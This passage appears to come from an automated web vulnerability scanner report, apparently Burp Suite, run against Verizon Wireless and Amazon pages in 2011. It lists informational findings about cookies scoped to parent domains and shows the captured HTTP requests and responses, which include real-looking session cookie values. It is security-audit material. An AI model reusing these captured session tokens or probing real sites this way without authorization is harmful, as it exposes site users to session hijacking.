Set-Cookie: HumanClickSiteContainerID_44153975=Master; path=/hc/44153975
Set-Cookie: LivePersonID=-16601155425835-1310995042:-1:-1:-1:-1; expires=Tue, 17-Jul-2012 13:19:00 GMT; path=/hc/44153975; domain=.liveperson.net
Cache-Control: no-store
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 27514

lpConnLib.Process({"ResultSet": {"lpCallId":"660732486522-110148310186","lpCallConfirm":"","lpJS_Execute":[{"code_id": "webServerOverride", "js_code": "if (lpMTagConfig.lpServer != 'sales.liveperson.n
...[SNIP]...

9.18. http://wireless.amazon.com/404

Summary

Severity:   Information
Confidence:   Certain
Host:   http://wireless.amazon.com
Path:   /404

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /404 HTTP/1.1
Host: wireless.amazon.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://burp/show/3
Cookie: session-id=179-6446207-1233155; session-id-time=1311598920l; ubid-main=188-9421442-7636565

Response

HTTP/1.1 404 Not Found
Date: Mon, 18 Jul 2011 13:02:13 GMT
Server: Server
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding,User-Agent
Set-Cookie: ubid-main=188-9421442-7636565; Domain=.amazon.com; Expires=Sun, 13-Jul-2031 13:02:13 GMT; Path=/
Content-Length: 4553


<html>

<head>
<title></title>


<meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/>
</head>

<body>
   <div id="wrapper">
       <div id="innerWrapper">
           <di
...[SNIP]...

9.19. http://wireless.amazon.com/HTC-Trophy-Windows-Verizon-Wireless/dp/B00528E2JU/ref=sh_br_ph_1

Summary

Severity:   Information
Confidence:   Certain
Host:   http://wireless.amazon.com
Path:   /HTC-Trophy-Windows-Verizon-Wireless/dp/B00528E2JU/ref=sh_br_ph_1

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /HTC-Trophy-Windows-Verizon-Wireless/dp/B00528E2JU/ref=sh_br_ph_1?ie=UTF8&transaction=INDIVIDUAL_NEW HTTP/1.1
Host: wireless.amazon.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://mobile.microsoft.com/windowsphone/en-us/buy/phonedetails.mspx?id=1685&np=1569-1684-1536-1537-1538-1568-1690-1685&WT.mpe=oHP-car

Response

HTTP/1.1 200 OK
Date: Mon, 18 Jul 2011 12:57:36 GMT
Server: Server
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding,User-Agent
Set-Cookie: ubid-main=179-9570509-7108862; Domain=.amazon.com; Expires=Sun, 13-Jul-2031 12:57:36 GMT; Path=/
Content-Length: 111404


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html>
<head>
   <meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7" />
   <title>Ama
...[SNIP]...

9.20. http://www.verizonwireless.com/b2c/vzwfly

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.verizonwireless.com
Path:   /b2c/vzwfly

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

POST /b2c/vzwfly HTTP/1.1
Host: www.verizonwireless.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.verizonwireless.com/b2c/store/controller?&item=phoneFirst&action=viewPhoneDetail&selectedPhoneId=5635
Cookie: GLOBALID=U0rDszSw9SV68cj1hODGnDTHalYNM%2FB%2FuJn%2B7rVAcc%2Fc6GD2xpZ0%2Bs4Orh8A1O1u; mbox=PC#1310569554435-90226.17#1312203471|check#true#1310993931|session#1310993870949-319721#1310995731; CP=null*; __utma=96859928.1761841238.1310569615.1310569615.1310993885.2; __utmz=96859928.1310993885.2.2.utmccn=(referral)|utmcsr=fakereferrerdominator.com|utmcct=/referrerPathName|utmcmd=referral; NSC_xxx_hwt=ffffffffa17b0cd945525d5f4f58455e445a4a420000; JSESSIONIDB2C=m2QBTktQzDgLsGGkf18drMdNkvTHdlJhykC5DM7rpkj8rQVPBXVy!-1801843931!mercury!5102!-1; SESSION_VALUE=m2QBTktQzDgLsGGkf18drMdNkvTHdlJhykC5DM7rpkj8rQVPBXVy!-1801843931!mercury!5102!-1!1310993856497; TIME_CHECKER=1310993856500; NSC_xxx_xmt_c2d_mcwt=ffffffff09f7172a45525d5f4f58455e445a4a4225de; gnVersion=2011Jul12104957; __utmb=96859928; __utmc=96859928; chkcookie=1310993892258
Content-Type: application/x-www-form-urlencoded
Content-Length: 199

query=item%3DphoneFirst%26action%3DviewPhoneDetail%26selectedPhoneId%3D5635%26go%3D%2Fstore%2Fcontroller%26&fd=&go=%2Fstore%2Fcontroller&zipcode=10010&rememberMyZip=&state=&prevstate=&change=&filter=

Response

HTTP/1.1 302 Moved Temporarily
Cache-Control: no-cache="Set-Cookie"
Connection: close
Date: Mon, 18 Jul 2011 13:01:19 GMT
Location: http://www.verizonwireless.com:80/b2c/store/controller?item=phoneFirst&action=viewPhoneDetail&selectedPhoneId=5635
Set-Cookie: CARTVIEW=FALSE; domain=.verizonwireless.com; expires=Monday, 18-Jul-2011 13:21:19 GMT; path=/
Set-Cookie: ZIPCODE=10010; domain=.verizonwireless.com; expires=Sunday, 16-Oct-2011 13:01:19 GMT; path=/
Set-Cookie: CITY=New York; domain=.verizonwireless.com; expires=Sunday, 16-Oct-2011 13:01:19 GMT; path=/
Set-Cookie: STATE=NY; domain=.verizonwireless.com; expires=Sunday, 16-Oct-2011 13:01:19 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Length: 439

<html><head><title>302 Moved Temporarily</title></head>
<body bgcolor="#FFFFFF">
<p>This document you requested has moved temporarily.</p>
<p>It's now at <a href="http://www.verizonwireless.com:80/
...[SNIP]...

10. Cookie without HttpOnly flag set
There are 39 instances of this issue: